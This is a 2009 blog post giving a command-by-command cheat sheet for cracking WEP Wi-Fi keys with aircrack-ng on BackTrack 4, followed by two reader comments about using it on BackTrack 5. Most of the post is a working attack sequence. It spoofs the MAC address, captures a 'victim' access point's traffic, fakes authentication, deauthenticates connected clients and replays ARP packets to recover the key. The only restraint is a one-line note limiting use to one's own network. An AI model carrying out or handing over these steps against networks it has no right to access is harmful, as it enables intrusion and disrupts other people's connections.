Monday, November 30, 2009

Cracking WEP with aircrack-ng ( cheat sheet)

We all should by now be aware of the famous insecurities of the wireless encryption WEP. Because of its implimentation of weak IVs (initialization vectors) in the packets, it becomes quite easy to guess certain packets (arp broadcast for example). The idea behind the attack is to capture enough packets so a program like aircrack can perform some analysis on the capture IVs and hence derive what the WEP key should be. We would be using the aircrack-ng suite of tools to crack us some WEP. Please perform this attack on your own network. This should be used only to audit the security of your own network or neworks to whom you have the right permissions to audit.

[Cheat sheet] using Bactrack4:

# ifconfig wlan0 down //bring down the wireless interface
# macchanger -r wlan0 //change your mac address to a random fake one
# ifconfig wlan0 up //bring back up the wireless intereface
# airmon-ng start wlan0 //create an interface that listens on monitor mode
# airodump-ng mon0 //analyze the air for potential WEP targets
# airodump-ng --bssid "mac_address_of_targetAP" --channel "channel_of_tacgetAP" -w wep.pcap mon0 //start capturing packets of your intended victim
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" --fakeauth 0 mon0 //perform a fake authentication to access point
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" --deauth 10 -c "Connected_client_mac_address" mon0 //Send deauth packets to disconnect a client from the target access point
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" -3 mon0 //perform arp replay attack to speed up the data retrieval process
#aircrack-ng -b "mac_address_of_targetAP" -P 2 wep.pcap-01.pcap //when there is enough packets (10000 or more) use aircrack this way to attemp to crack the WEP key

Thats it ...
Please use google to find out more information about the insecurities of WEP.


  1. I know this is an old post but I was just wondering would this cheat sheet be transferable to BT5?
    I've been fiddling around and can't seem to make sense of it

  2. Should work the same on BT5. BT5 has the same suite of tools from aircrack-ng for cracking wep that i showed in the tutorial. If you want to use GUI tools, you can google grimwepa (was availale in BT4) and gerix-wifi-cracker-ng.